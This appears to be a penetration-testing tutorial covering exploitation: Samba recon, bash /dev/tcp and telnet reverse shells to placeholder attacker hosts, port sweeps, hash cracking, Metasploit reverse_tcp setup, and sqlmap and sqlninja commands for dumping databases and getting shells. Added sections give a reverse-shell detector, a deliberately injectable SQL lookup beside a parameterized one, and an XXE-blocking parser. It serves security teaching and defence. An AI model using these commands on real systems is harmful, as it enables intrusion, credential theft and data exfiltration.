Practical Security Assessment (Penetration Testing) - Exploitation
The goal of exploitation is to expose data that could be leaked and show how the organization as a whole can be damaged if vulnerabilities are not mitigated. The possibility of planting a backdoor and using a machine in a botnet is a good reason for the organization to listen to you.
Samba
If you see port 139/TCP open, do some Samba recon and figure out what version is running. The -L parameter lists the shares available on the given IP. The -N parameter suppresses the password prompt, since we do not have a password.
$ nmblookup -A IP_TARGET
$ smbclient -L IP_TARGET -N
$ smbclient -L //SHARE_NAME -I IP_TARGET
Interactive shell
$ /bin/sh -i
Exploit Search
Navigate to https://www.exploit-db.com and search there, or you can type these commands in Kali:
$ searchsploit NAME
$ searchsploit samba
A shell back to you
Set up netcat on your box so that it listens on port 5757:
$ nc -l -p 5757 -vv
Call a command on the target:
$ /bin/bash -i > /dev/tcp/YOUR_ATTACKER_IP/5757 0<&1 2>&1
Magic Port Scan and Shell
Assuming that you are on the machine you have compromised, you can do the following to perform a port scan of any IP you want:
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/IP_ANOTHER_TARGET/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
Similarly, you can do this:
$ for ((i=0; $i < 65535; i++)); do echo > /dev/tcp/IP/$i && echo $i open; done 2>/dev/null
More old-school stuff for communicating with the box over telnet:
$ telnet attacker_IP PORT1 | /bin/bash | telnet attacker_IP PORT2
Password Brute-Forcing
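Every technique in the two sections above leaves the same trace on the compromised host: a command line that opens bash's /dev/tcp pseudo-device or pipes telnet into a shell. As an added defender-side example (not from the original page), here is detection logic run over a constructed sample of command lines such as a host agent would collect from shell history or process-execution auditing; it labels reverse shells, bash port sweeps and telnet shell pipes.

```python
import re

# Constructed sample of command lines as a host agent might collect them from
# shell history or process-execution auditing; not taken from the original page.
SAMPLE_LINES = [
    "ls -la /var/www",
    "/bin/bash -i > /dev/tcp/198.51.100.7/5757 0<&1 2>&1",
    "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/192.0.2.10/$port; port=`expr $port + 1`; done",
    "for ((i=0; $i < 65535; i++)); do echo > /dev/tcp/192.0.2.10/$i && echo $i open; done 2>/dev/null",
    "telnet 198.51.100.7 4444 | /bin/bash | telnet 198.51.100.7 4445",
    "curl -s https://example.net/health",
]

# bash's /dev/tcp/HOST/PORT pseudo-device; the port field stops at shell separators.
DEVTCP = re.compile(r"/dev/(?:tcp|udp)/([^/\s]+)/([^\s;&|)]+)")
# A shell binary invoked as a command word.
SHELL = re.compile(r"(?:^|[;|&\s])(?:/bin/)?(?:ba)?sh\b")
# A descriptor duplicated onto another one, e.g. 0<&1 or 2>&1.
FD_DUP = re.compile(r"[<>]&\d")
# telnet feeding a shell whose output goes to a second telnet session.
TELNET_PIPE = re.compile(r"telnet\s+\S+\s+\d+\s*\|\s*(?:/bin/)?(?:ba)?sh\b.*\|\s*telnet\s+\S+\s+\d+")

def classify(cmd):
    """Return (label, host, port) for one command line, or None if nothing matched."""
    m = DEVTCP.search(cmd)
    if m:
        host, port = m.group(1), m.group(2)
        # A shell with its descriptors tied to /dev/tcp is a reverse shell.
        if SHELL.search(cmd) and FD_DUP.search(cmd):
            return ("reverse_shell", host, port)
        # A shell variable in the port position means a loop sweeping ports.
        if port.startswith("$"):
            return ("port_sweep", host, port)
        return ("devtcp_other", host, port)
    if TELNET_PIPE.search(cmd):
        return ("telnet_shell_pipe", None, None)
    return None

def scan(lines):
    """Return [(line_number, label, host, port), ...] for every suspicious line."""
    findings = []
    for number, cmd in enumerate(lines, 1):
        hit = classify(cmd)
        if hit:
            findings.append((number,) + hit)
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

The regexes match only what is visible in the command line; a shell started from a script file or an obfuscated one-liner needs process-tree or network-level detection (an interactive shell whose stdin is a socket) instead.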
John The Ripper:
$ john --wordlist=rockyou.txt --rules=Jumbo hashes.txt
HashCat (probably the best one to date), which you can learn about on their wiki:
Attack-Mode       | Hash-Type | Example command
==================+===========+==================================================================
Wordlist          | SHA1      | hashcat -a 0 -m 100 exampleSha1.hash example.dict
Wordlist + Rules  | MD5       | hashcat -a 0 -m 0 exampleMd5.hash example.dict -r rules/best64.rule
Brute-Force       | MD5       | hashcat -a 3 -m 0 exampleMd5.hash ?a?a?a?a?a?a
Combinator        | MD5       | hashcat -a 1 -m 0 exampleMd5.hash example.dict example.dict
Metasploit
Learn Metasploit
- securitytube.net --> megaprimers --> metasploit framework expert
- opensecuritytraining.info
- Metasploit-unleashed
- Metasploit cheat-sheet
- Meterpreter basics
Setting up Metasploit
First, let's set up the database:
$ service postgresql start
$ msfdb init
Now we can open Metasploit; type: msfconsole
We can create our own workspace for future use: workspace -a PentestClass
Then type workspace PentestClass to use the workspace. It lets us store all the details of the pentest in one place that can be referred to later on.
You can run an nmap scan from within Metasploit:
msf> db_nmap -sS -sV -sC IP_TARGET
You can type commands like hosts and services to see the results in a nice format. You can search for exploits inside Metasploit: search samba
To use a certain exploit, type use with the full path to the exploit after searching for it:
msf> use exploit/linux/service_name/exploit_name
Type info to see information about the exploit. Type show options to see which options you need to set before the exploit can be launched. RHOST is the remote host, the IP of the TARGET: type set RHOST IP_TARGET. Now we also need to set a payload that will be sent across the wire from us to the TARGET. When the TARGET is compromised by the exploit, it will use the payload to connect back to us -- a so-called "reverse shell". Type show payloads to see all available payloads, then set payload linux/x86/shell/reverse_tcp. LHOST is the IP of our Kali box, the IP the TARGET will connect back to when it is compromised. LPORT is the port on our Kali box to which the TARGET will try to connect. Now we are ready to exploit; type exploit
Web Pentest
Load balancing detection: lbd website.com
Detecting web application firewalls: wafw00f website.com
Use BeEF, Nikto, w3af, Vega, Burp Suite (the free version is slow; the paid one costs a few hundred dollars) or OWASP ZAP Proxy to pentest the website.
XSS Attacks
- Excess XSS - a comprehensive tutorial on cross-site scripting
- Ultimate XSS Polyglot - a universal XSS line that will work almost everywhere
- XSS payloads
- XSS injections for all kinds of cases
- Reddit Crowdsourcing for XSS
Automated SQL Attacks
sqlmap.py
sqlmap is an automatic SQL injection and database takeover tool written in Python.
sqlmap --wizard # will help to learn from scratch
sqlmap -u "http://...?id=5" -b # grab the banner
sqlmap -u "http://...?id=5" --current-user
sqlmap -u "http://...?id=5" --current-db # current database
sqlmap -u "http://...?id=5" --dbs # all databases
sqlmap -u "http://...?id=5" -D DBname --tables # tables for DBname
sqlmap -u "http://...?id=5" -D DBname -T TableName --columns # columns for table TableName
sqlmap -u "http://...?id=5" -D DBname -T TableName --columns --dump # dump all the data
sqlmap -u "http://...?id=5" --users --passwords
sqlmap -u "http://...?id=5" --dbms=[database_type] # run against specific database type
sqlmap -u "http://..." --data="id=5" --os-shell # will give you a shell
sqlninja
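What sqlmap is probing for in that "?id=5" parameter is a query built by string concatenation. As an added illustration (example code, not from the original page; the users table is constructed in memory with Python's sqlite3 module), here is the vulnerable lookup beside its hardened form, where a bound parameter and type validation keep the request value from changing the shape of the query.

```python
import sqlite3

# Constructed in-memory table standing in for the database behind "...?id=5".
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(5, "alice", "user"), (6, "bob", "admin"), (7, "carol", "user")])

def lookup_vulnerable(id_param):
    """The pattern sqlmap detects: the request parameter is spliced into the SQL text,
    so a value such as '5 OR 1=1' rewrites the WHERE clause and returns every row."""
    sql = "SELECT name FROM users WHERE id = " + id_param
    return [row[0] for row in conn.execute(sql)]

def lookup_hardened(id_param):
    """Validate the type, then bind the value: the driver sends it as data, never as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []   # reject anything that is not an integer id
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (id_value,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    for value in ("5", "5 OR 1=1"):
        print(value, "->", lookup_vulnerable(value), "vs", lookup_hardened(value))
```

A parameterized query alone would already stop the injection; the int() check on top of it is the input-validation layer that also turns sqlmap's probe into a harmless empty result rather than a database error it can fingerprint.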
Sqlninja is an SQL Server injection & takeover tool. Here are some of the parameters you can set:
host = target_ip
page = vulnerable_page
stringstart = id=2
lhost = our_attack_machine_ip
device = eth0
msfpath = path_to_metasploit
resolvedip = our_attack_machine_ip
Test fingerprint:
sqlninja -m t -f sqlninja.app.conf -d 1
Real fingerprint:
sqlninja -m f -f sqlninja.app.conf -d 1
Resurrect xp_cmdshell:
sqlninja -m x -f sqlninja.app.conf -d 1
Upload netcat:
sqlninja -m u -f sqlninja.app.conf -d 1
Get interactive shell:
sqlninja -m s -f sqlninja.app.conf -d 1
XXE Attacks
XML External Entity injection (XXE) is a powerful method of exploiting XML parsers that resolve entities declared in a document's DTD. Example is here.
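As an added defensive example (not the example the page refers to, and not from the original page), here is a Python parser built on xml.parsers.expat that refuses any DOCTYPE and any external entity reference, which is the standard mitigation for XXE; both XML documents below are constructed inputs.

```python
import xml.parsers.expat

class DtdRejected(Exception):
    """Raised when untrusted XML carries a DOCTYPE or references an external entity."""

def parse_untrusted_xml(data):
    """Parse XML with expat while refusing DTDs; returns {tag: text} for every element.
    Rejecting the DOCTYPE up front blocks external entities (XXE) and entity-expansion
    bombs alike, because both need a DTD to declare the entity in the first place."""
    parser = xml.parsers.expat.ParserCreate()
    result, stack, text = {}, [], []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} not allowed in untrusted input")

    def reject_external(context, base, sysid, pubid):
        raise DtdRejected(f"external entity {sysid!r} blocked")   # belt and braces

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def end(name):
        result[stack.pop()] = "".join(text).strip()
        text.clear()

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)   # an exception raised in a handler propagates out of Parse()
    return result

def is_rejected(data):
    """True if the document is refused by the DTD policy, False if it parses cleanly."""
    try:
        parse_untrusted_xml(data)
    except DtdRejected:
        return True
    return False

# Constructed inputs: a benign document and one declaring an external entity.
GOOD = "<order><item>widget</item><qty>3</qty></order>"
XXE = ('<?xml version="1.0"?>'
       '<!DOCTYPE order [<!ENTITY ext SYSTEM "file:///placeholder/secret.txt">]>'
       '<order><item>&ext;</item></order>')
```

The same policy is available as a switch in most XML libraries (for example lxml's resolve_entities=False on XMLParser); the point of spelling it out with expat handlers is to show that the decision is made before any entity is declared, not after.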